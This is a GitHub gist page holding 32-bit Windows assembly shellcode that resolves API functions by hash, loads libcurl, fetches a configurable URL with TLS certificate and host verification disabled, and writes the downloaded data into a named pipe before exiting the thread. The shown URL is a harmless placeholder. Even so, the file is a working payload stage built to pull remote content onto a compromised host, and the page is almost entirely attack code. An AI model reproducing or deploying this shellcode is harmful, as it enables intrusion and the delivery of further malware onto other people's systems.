Skip to content

Instantly share code, notes, and snippets.

@phikshun

phikshun/https_curl_pipe32.asm

Created September 3, 2012 17:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save phikshun/3611352 to your computer and use it in GitHub Desktop.
Save phikshun/3611352 to your computer and use it in GitHub Desktop.
Download ZIP
LibCurl Pipe Shellcode Win32
Raw
https_curl_pipe32.asm
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
cld
mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
sub esp, 0x2000 ; Alloc some space on stack
call start
delta:
%include "block_api32.asm"
start:
pop ebp
mov dword [esi-32], ebp ; we'll need this later
xor eax, eax
push eax
push eax
push 0x03 ; OPEN_EXISTING
push eax
push eax
push 0x40000000 ; GENERIC_WRITE
lea ecx, [ebp+szPipeName-delta]
push ecx ; \\.\pipe\foo
push 0x4FDAF6DA ; CreateFileA
call ebp
xor ecx, ecx ; check for errors...
sub ecx, 1
cmp eax, ecx
je error_found ; INVALID_HANDLE_VALUE = -1
mov dword [esi-28], eax ; [esi-28] => hFile
lea eax, [ebp+szLibcurl-delta]
push eax
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA("libcurl.dll");
test eax, eax ; make sure libcurl.dll can be found
jz error_found
mov dword [esi], eax ; [esi-0] => hModuleLibcurl
lea ecx, [ebp+szCurlGlobalInit-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlGlobalInit);
mov dword [esi-4], eax ; [esi-4] => curl_global_init
lea ecx, [ebp+szCurlEasyInit-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyInit);
mov dword [esi-8], eax ; [esi-8] => curl_easy_init
lea ecx, [ebp+szCurlEasySetopt-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasySetopt);
mov dword [esi-12], eax ; [esi-12] => curl_easy_setopt
lea ecx, [ebp+szCurlEasyPerform-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyPerform);
mov dword [esi-16], eax ; [esi-16] => curl_easy_perform
lea ecx, [ebp+szCurlEasyCleanup-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyCleanup);
mov dword [esi-20], eax ; [esi-20] => curl_easy_cleanup
push 0x3 ; (CURL_GLOBAL_WIN32 | CURL_GLOBAL_SSL)
call dword [esi-4] ; curl_global_init
call dword [esi-8] ; curl_easy_init
mov dword [esi-24], eax ; [esi-24] => CURL *curl
test eax, eax ; make sure curl is loaded
jz error_found
lea ecx, [ebp+post_params-delta]
xor ebx, ebx
mov bl, byte [ecx]
test ebx, ebx ; test first byte of post_params
jz skip_post ; to see if we are making a post req
push ecx ; post_params
push 10015 ; CURLOPT: CURLOPT_POSTFIELDS
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );
skip_post:
lea ecx, [ebp+server_url-delta]
push ecx ; URL
push 10002 ; CURLOPT: CURLOPT_URL
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_URL, URL );
lea ecx, [ebp+start_pipe-delta]
push ecx ; write_data
push 20011 ; CURLOPT: CURLOPT_WRITEFUNCTION
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, write_data );
push esi ; pointer to variables
push 10001 ; CURLOPT: CURLOPT_WRITEDATA
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEDATA, pVariables );
xor ecx, ecx
push ecx ; 0L
push 64 ; CURLOPT: CURLOPT_SSL_VERIFYPEER
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYPEER, 0L );
xor ecx, ecx
push ecx ; 0L
push 81 ; CURLOPT: CURLOPT_SSL_VERIFYHOST
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYHOST, 0L );
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-16] ; curl_easy_perform(curl);
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-20] ; curl_easy_cleanup(curl);
error_found:
push byte 0 ; push the exit function parameter
push 0x6F721347 ; ntdll.dll!RtlExitUserThread
call ebp ; call EXITFUNK( 0 );
start_pipe:
push ebp
mov ebp, esp
sub esp, 8
push edi
push esi
push ebx
push edx
xor eax, eax
mov dword [ebp-4], eax
lea edi, [ebp-4] ; allocate for dwBytesWritten
mov eax, dword [ebp+20]
mov ebx, dword [eax-28] ; save hFile in ebx
mov esi, dword [ebp+8] ; buffer
mov eax, dword [ebp+12] ; size
mov ecx, dword [ebp+16] ; nmemb
mul ecx ; result in eax
xor ecx, ecx
push ecx ; NULL
push edi ; &dwBytesWritten
push eax ; buffer size
push esi ; source buffer
push ebx ; hFile
push 0x5BAE572D ; WriteFile
mov eax, dword [ebp+20]
call dword [eax-32] ; old api call pointer
mov eax, dword [edi] ; return dwBytesWritten
pop edx
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
ret
szPipeName:
db '\\.\pipe\foo', 0
times 4 db 0
szLibcurl:
db 'libcurl.dll', 0
szCurlGlobalInit:
db 'curl_global_init', 0
szCurlEasyInit:
db 'curl_easy_init', 0
szCurlEasySetopt:
db 'curl_easy_setopt', 0
szCurlEasyPerform:
db 'curl_easy_perform', 0
szCurlEasyCleanup:
db 'curl_easy_cleanup', 0
server_url:
db 'http://www.google.ca/s?q=lolcat', 0
times 32 db 0
post_params:
db 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment